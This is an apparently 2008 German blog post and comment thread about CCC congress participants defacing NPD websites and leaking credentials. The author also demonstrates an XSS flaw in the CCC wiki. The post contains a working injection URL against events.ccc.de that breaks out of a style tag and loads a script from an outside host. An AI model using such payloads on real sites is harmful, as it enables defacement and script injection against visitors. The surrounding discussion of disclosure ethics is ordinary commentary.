XSS: Chaos Computer Club gehackt

Mittwoch, 31. Dezember 2008, 1:56 Uhr |  Autor: ich

Die Jungs und Mädels vom Chaos Computer Club (CCC) haben mal wieder einen Kongress, den “25. Chaos Communication Congress: nothing to hide”, veranstaltet und dabei einige WebSites gehackt. Speziell haben sie sich der WebSites und Server der NPD angenommen.

Heise schreibt von “25C3: NPD-Webseiten fest in Hackerhand” (heise.de)

Man kann nun geteilter Meinung sein, ob man es gut findet das beim 25C3 WebSites der NPD mit Defacements überzogen und die XSS-Links dazu veröffentlicht wurden. Aber was nun vollkommen indiskutabel und an Unseriösität der Veranstalter kaum noch zu überbieten ist, ist das Zugangsdaten der User und der Datenbanken veröffentlicht wurden. Solche Aktionen schaden dem CCC und dem Ruf der Hacker die nichts böses im Schilde führen und nur aufklären wollen.


Ich habe mal beim CCC selber nach Lücken geschaut, dort sieht es auch nicht so viel besser aus, als auf den WebSites über die sich diese CCC-Hacker lustig machen und deren Zugangsdaten sie veröffentlichen…
XSS 4 CCC
Der Screenshot ist mit folgendem verlinkt:
http://events.ccc.de/congress/2008/wiki/index.php?
title=Special:Recentchanges&action=edit&gen=js&useskin=
</style><script src=http://meingottundmeinewelt.de/xss/25c3.js></script><style>
Das JavaScript fügt nur etwas Defacement per CSS ein.

Auf den CCC-Seiten gibt es noch weitere Lücken, da ich aber kein CCC-Hacker bin…


Update:
MediaWiki ‘useskin’ Cross-Site Scripting Vulnerability (securityfocus.com)

  • Twitter
  • del.icio.us
  • Google Bookmarks
  • Yigg
  • MisterWong.DE
  • Webnews.de
  • Wikio
  • Technorati
Tags »   

Trackback: Trackback-URL | Feed zum Beitrag: RSS 2.0
Thema: Sicherheit, XSS

Kommentare und Pings sind geschlossen.

18 Kommentare

  1. 1
    testpeter 
    Mittwoch, 31. Dezember 2008, 5:23 Uhr

    Schön, wie man sich gegenseitig an Sachen hochziehen kann ;)

  2. 2
    testpeter 
    Mittwoch, 31. Dezember 2008, 5:25 Uhr

    Achso …

    Erster

  3. 3
    Paze 
    Mittwoch, 31. Dezember 2008, 10:02 Uhr

    DIe Sache mit de NPD….eigentlich klasse, aber kindisch.

    Nur die Sache mit den passwd’s -> nicht cool.
    Kindische dumme Aktion. Beschweren sich über ein GG-Staat aber machen dasselbe.

    Dein Defacement tut denen glaub auch gut =)

    lg Paze

  4. 4
    Stitch 
    Mittwoch, 31. Dezember 2008, 11:53 Uhr

    Ich muss Paze zustimmen, klasse aktion mit dem CCC Hack!!
    Und das NPD gehackt wurde find ich auch richtig nur das man die passwörter rausgibt ist nun wirklich unter aller Sau^^

  5. 5
    Michael 
    Donnerstag, 1. Januar 2009, 21:42 Uhr

    Wo soll da der Hack sein? Du hats höchstens zuviel Hack im Kopf. Versuch es lieber bei ::1, denn vom Hacken selber hast du nicht die leiseste Ahnung.

  6. 6
    marianne 
    Freitag, 2. Januar 2009, 5:00 Uhr

    schon peinlich für den CCC… they don´t practice what they preach, so macht macht man sich am gründlichsten unglaubwürdig. was schade ist, denn es schadet der sache, schließlich steht der CCC für was, bzw. stand.

    jetzt das mit den npd-zugangsdaten da könnten sie sich noch mit ideologischen (=idiotischen…) gründen rausreden, nur daß sie ja auch die daten von “guten” bürgern so behandeln. das hat so was von den argumenten der raf: nur wenn es richtig wehtut werden die leute aufmerksam… nur damit erreichen sie das gegenteil und geben denen wasser auf die mühlen die hacken grundsätzlich verteufeln. auch damit schaden sie der sache.

    ich finde schon länger es wird zeit daß der CCC mal seine einstellung grundsätzlich ändert, richtig ernstzunehmen sind sie schon länger nicht mehr, aber inzwischen kommt noch dazu daß sie eher schaden als nutzen.

    ich weiß auch nicht was die sich dabei denken immer wieder persönliche daten im großen stil preiszugeben, geht denen dabei einer ab? kompensation von unerfüllten machtgelüsten? frag ich mich schon länger was bei denen eigentlich schiefgelaufen ist. ich würde sagen die brauchen mal konkurrenz.

  7. 7
    mr.gene 
    Freitag, 2. Januar 2009, 11:02 Uhr

    Und noch keine Reaktion des CCC zu deinem Beitrag?

    Ich bin verwundert…

  8. 8
    Michael 
    Freitag, 2. Januar 2009, 15:19 Uhr

    @mr.gene

    Wie sollen die posten wenn die noch immer lachend am Boden liegen? Wenn das ein Hack ist ist der deutsche Staat auch schuldenfrei.

  9. 9
    okrinom 
    Freitag, 2. Januar 2009, 16:53 Uhr

    Ich würd mich vor allem erstmal grundsätzlich informieren, bevor ich hier so einen Mist verzapfe…

    Die “Veranstalter” haben mit den Hacks überhaupt nichts zu tun, sondern das sind Teilnehmer gewesen!

    Vielleicht sollten die versammelten Plattitüden-Wurfmaschinen mal den Unterschied zwischen dem CCC als Verein, den Veranastaltern des Kongresses und den tausenden Teilnehmern des Kongresses versuchen zu verstehen anstatt hier altklugen Dünnpfiff wie “ich finde schon länger es wird zeit daß der CCC mal seine einstellung grundsätzlich ändert” zu verbreiten.

    Grüße,

    und nein, ich bin kein CCCler, und nein ich war nicht in Berlin

  10. 10
    ich 
    Freitag, 2. Januar 2009, 17:47 Uhr

    @okrinom:
    Es mag sein das der CCC-Verein, die Veranstalter des 25C3 und die Teilnehmer, die zum größten Teil keine CCC-Mitglieder sind, verschiedene Leute sind, aber trotzdem wurden die Zugangsdaten mit Billigung des CCC veröffentlicht und darum geht es.

    Ich erinnere nur an: “CCC meldet Sicherheitsleck bei TNS Infratest/Emnid: Das Wohnzimmer von 41.000 Bürgern im Netz

    PDF aus der Datenschleuder dazu.

    Aus dem PDF: “Und weil das händische Eintippen so mühsam erschien, half uns ein kleines python-Script beim Sicherstellen der Stammdaten.”

    War es wirklich erforderlich alle 41.000 Datensätze sicherzustellen um das Datenleck zu testen? Hätte es evtl. nicht auch vollkommen ausgereicht TNS Infratest/Emnid nur einige Datensätze als Beweis für die Lücke zu präsentieren?

  11. 11
    dau 
    Freitag, 2. Januar 2009, 19:16 Uhr

    schon echt schwer so in einem Wiki eine eigene Seite zu machen und da sein Bild einzubinden… du bist ein erstklasse Hacker, unglaublich^^

  12. 12
    ich 
    Freitag, 2. Januar 2009, 19:22 Uhr

    @dau:
    Jau!!! Superschwer!!!

    Wie ich hier beschrieben habe, genau so schwer wie die NPD-Seiten zu verunstalten… ;O)

    PS: In dem Wiki vom CCC bin ich nicht als User angemeldet, wie man an der URL unschwer erkennen kann.

  13. 13
    cortex 
    Samstag, 3. Januar 2009, 9:24 Uhr

    @okrinom: der kongress segelte unter der flagge des ccc. feinsinnige unterscheidungen sind hier eher fehl am platze und lassen sich nach aussen schwer vermitteln.
    der vorwurf, dass im hiesigen blog altkluger dünnsch*** verbreitet würde, ist eher haltlos; deine art zu kommunizieren hingegen nicht – das heise-forum lässt grüssen.

    cx

    ps. seltsam, dass es so oft “die anderen” waren bzw. sind… fehlendes rückgrat ist offensichtlich symptomatisch in unserem gesellschaftlichen “miteinander”.

  14. 14
    okrinom 
    Samstag, 3. Januar 2009, 18:57 Uhr

    @ich:
    Ich denke in der Tat, dass es nötig war alle Datensätze zu extrahieren um eine entprechende Wirkung in den Medien zu erreichen und die Ausmaße des Problems zu demonstrieren.

    Für die “Billigung” für die Veröffentlichung der NPD Zugangsdaten finde ich keine Anhaltspunkte, da das Kongress-Wiki zu sperren bzw. zu zensieren vollkommen sinnlos gewesen wäre.

  15. 15
    erdgeist 
    Dienstag, 6. Januar 2009, 15:18 Uhr

    @ich: erdgeist von der Datenschleuder hier. Ja, es war notwendig, alle Daten zu sichern und im Beisein unseres Datenschutzbeauftragten versiegelt aufzubewahren, um einem klammheimlichen Schließen der Lücke und der Behauptung, nichts wäre passiert, vorzubeugen.

    Auch hätte der Chaos Computer Club der Einhaltung der Informationspflicht aller Betroffener nachgeholfen, hätte Infratest sich aus der Affäre zu stehlen versucht.

    Natürlich sind Artikel und Pressemitteilung zugespitzt geschrieben worden.

    Zum XSS auf der Mediawiki-Seite kann man den Administratoren auch keinen Vorwurf machen, da sie eine gut gepflegte Installation benutzen. Der CCC selber hat den NPD-”hack” bewusst nicht kommentiert.

    Ich persönlich finde ihn auch kindisch, auf der anderen Seite sind es halt _auch_ Script-Kinder, die zum Congress zu Besuch kommen und ihre Art des Humors im öffentlichen Wiki dokumentieren. Diese Besucher nun “CCC-Hacker” zu nennen, finde ich unangebracht, hier mußt Du Dir den Vorwurf der Polemik gefallen lassen.

    Liebe Grüße aus Berlin

    erdgeist

  16. 16
    ich 
    Dienstag, 6. Januar 2009, 16:31 Uhr

    @erdgeist:
    “Ja, es war notwendig, alle Daten zu sichern…”
    Da bin ich halt anderer Meinung und denke das der CCC sich in eine Ecke manövriert in die er nicht gehört.

    “Zum XSS auf der Mediawiki-Seite…”
    Ich mach da niemanden einen Vorwurf, ich wundere mich nur das eine Version vom März eingespielt wurde, obwohl die Lücke seit Oktober bekannt ist und es entsprechende Updates gibt – hatte ich einfach nicht vom CCC erwartet. :O)

    “Der CCC selber hat den NPD-”hack” bewusst nicht kommentiert.”
    Was ich schade finde, eine Meinung vom CCC dazu würde mich schon interessieren. Aber wahrscheinlich gibt es nicht “den CCC” mit einer Meinung dazu – die einen finden es gut, die anderen nicht und noch anderen ist es wurscht, was die Scriptkiddies da gemacht haben.

    “Diese Besucher nun “CCC-Hacker” zu nennen…”
    Ok, ich könnte sie auch “25C3-Teilnehmer-deren-Handeln-vom-CCC-gebilligt-wurde” nennen. ;O)

  1. 17
    Vorgelesen (via Pingback)
    Uhr

    [...] mein gott und meine welt » Blog Archive » XSS: Chaos Computer Club gehackt [...]

  2. 18
    Links 90 « FreiheIT-Blog (via Pingback)
    Uhr

    [...] XSS: Chaos Computer Club gehackt (Mein Gott und meine Welt) [...]